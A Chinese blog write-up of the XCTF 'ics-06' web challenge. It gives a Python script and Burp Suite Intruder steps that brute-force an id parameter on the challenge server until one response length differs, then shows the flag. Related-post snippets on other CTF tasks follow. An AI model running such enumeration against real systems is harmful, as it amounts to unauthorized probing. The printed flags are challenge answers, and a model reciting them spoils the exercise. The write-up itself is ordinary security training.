【攻防世界】ics-06

已于 2023-07-13 16:36:24 修改
阅读量530 收藏 2
点赞数 1
分类专栏: CTF-web 文章标签: web安全 网络安全 web
于 2023-07-13 12:47:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74979597/article/details/131699060
版权

 1.信息收集:

题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。

发现输入日期没有反应;id值也没有变化;当手动改变id值时反馈的内容一样,按题目描述:数据被删除了,只有一处留下了入侵者的痕迹。 

总之,可能在某个id里有不一样的数据;

2.按思路:

我需要再某个范围的id都试一边,但手动浪费精力和时间,那怎么办?

1.用python编程来实现,因为只有某一个id返回的内容不一样,利用这一点;

2.用各种各样的工具,本质就是一个个去试,专业一点叫爆破,我这里用Burpsuite;

用python编程:

import requests

# 定义基础 URL
base_url = "http://61.147.171.105:54389/index.php?id="

# 定义目标内容长度
target_length = None

# 循环尝试 ID
for id in range(1, 3000):
    # 构建完整的 URL
    url = base_url + str(id)
    
    # 发送 HTTP 请求
    response = requests.get(url)
    
    # 获取响应的内容长度
    content_length = len(response.content)
    
    # 检查内容长度是否与目标长度不同
    if target_length is None:
        target_length = content_length
    elif content_length != target_length:
        print("找到内容长度不同的 ID:", id)
        break
else:
    print("未找到内容长度不同的 ID")

用Burpsuite:

1.拦截模块拦截,打开拦截,再浏览器输入地址,再把拦截到的发送到intruder模块;

2.选择变量所在位置,设置为变量,再设置相关参数的范围;

 

 

在右上角有start attack,开始: 

最终比较返回数据长度,得到了flag:cyberpeace{adcb0e2db017efe133ac0ab432c09560}

Miracle&
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界--ics-06
qq_73611185的博客
09-09 966
发现请求为2333时长度和其他不一样,在网站输入get请求为?id=2333得到flag:cyberpeace{3f9258463290166bfecb5d3699a33379}结合题目描述说是有入侵者侵入的痕迹,啥都点了一遍发现只有报表中心可以点进去,由于太菜,没有思路,直接去看了wp。这题使用的工具是burpsuite进行爆破,首先打开firefox自带的代理器插件然后打开burpsuite。成为ctf全栈之路之web第八题。第五步,开始进行爆破,
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4486
尝试
攻防世界ics-06
淡巴枯的博客
12-20 1563
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
攻防世界-webics-06
weixin_73625393的博客
10-28 942
点击【设置】后,将代理改为【手动配置代理】,将HTTP代理内容改为在brupsuite中查看到的代理ip,更改完后点击【确定】框3是对可疑的数据进行暴力破解,需要将它做个标识,将光标放到1前,然后按框4的键,对1标识进行暴力破解,鼠标右键,点击【Send to Intruder】发送到【Intruder】,快捷键为【Ctrl+l】方法一:打开【设置】后,在【常规】中,翻到最下边,找到【网络设置】,打开【设置】返回下图界面,进行设置,设置完成后,按框5,执行。点击框5后,破解,下图为正在破解中。
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界nice-bgm杂项
11-20
网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界hit-the-core,杂项misc
11-01
攻防世界hit-the-core,杂项misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127626829
攻防世界—-(web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
攻防世界 ics-06 write up
m0_73605862的博客
05-07 189
Step3:点击payloads,将Payloads type选择numbers,在number range一栏,对to选择10000,选择step为1,其余保持默认,然后点击start attack。Step2:用burpsuite进行抓包,然后右键点击send to intruder传输至intruder。【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list。Step4:观察结果发现,当id=2333时,包的长度比其他的要长。【题目】ics-06
网络安全 | CTF】攻防世界 ics-06 解题详析
等风来
05-20 3606
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,留下了入侵者的痕迹。仅栏能打开新窗口:注意到URL栏的id参数,对id进行爆破。
ics-06-攻防世界
最新发布
szhangliwenya的博客
03-21 218
此处若直接点击攻击会报错必须先点击Hex重新回到十进制,才可成功。cookie提示cookie.php但是访问报错,只能爆破id了。id为2333时响应包长度不同且cyberpeace得到响应。找到匹配响应包的匹配处加入flag、cyberpeace。最好现在去加入过滤,匹配响应包的数据,以便找到flag。F12和页面源代码没有反应。payload处类型选择数字。点击多处只有报表中心有反应。在id处添加爆破位置。从1-10000间隔1。
攻防世界Webics-06、unserialize3、supersqli”题解
qq_53325209的博客
04-18 3287
攻防世界Web 高手进阶区 “ics-06、unserialize3、supersqli”三道题解。
攻防世界】五、ics-06
Hi~ 土拨鼠
09-09 245
步骤 打开所给场景 发现只有报表中心可以打开,而且会自动重定向到id=1,修改id的值(试了几次)页面好像也没发生变化,这里有点怪异,我们使用burp对id进行爆破 首先进行抓包: 将抓到的包发送到intruder模块: 添加变量 设置攻击载荷 我这里是写了个python脚本生成了1-10000数字的文件,代码: for i in range(1,10001): f = open('D:/shuzi.txt','a+') f.write(str(i)) f.write('.
攻防世界 web进阶 ics-06
Hrain7的博客
11-16 2608
进入页面后发现只有报表中心可以点进去 然后在url里发现了 id=1,以为是sql注入,但是输入了半天没反应 然后看了网上的wp才知道是要改变id的值,然后输入id=2,id=3,id=4 都没反应,试着用bp抓包一下 bp抓包后发送到intruder 添加字典,然后开始攻击 我用的字典是用python写的1-5000 然后开始攻击,发现2333的长度与别的不一样 在下面的responce里面也能发现flag,或者在页面中输入id=2333也能得到flag ...
攻防世界web新手关之ics-06
weixin_45746283的博客
11-25 336
攻防世界web新手关之ics-06

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值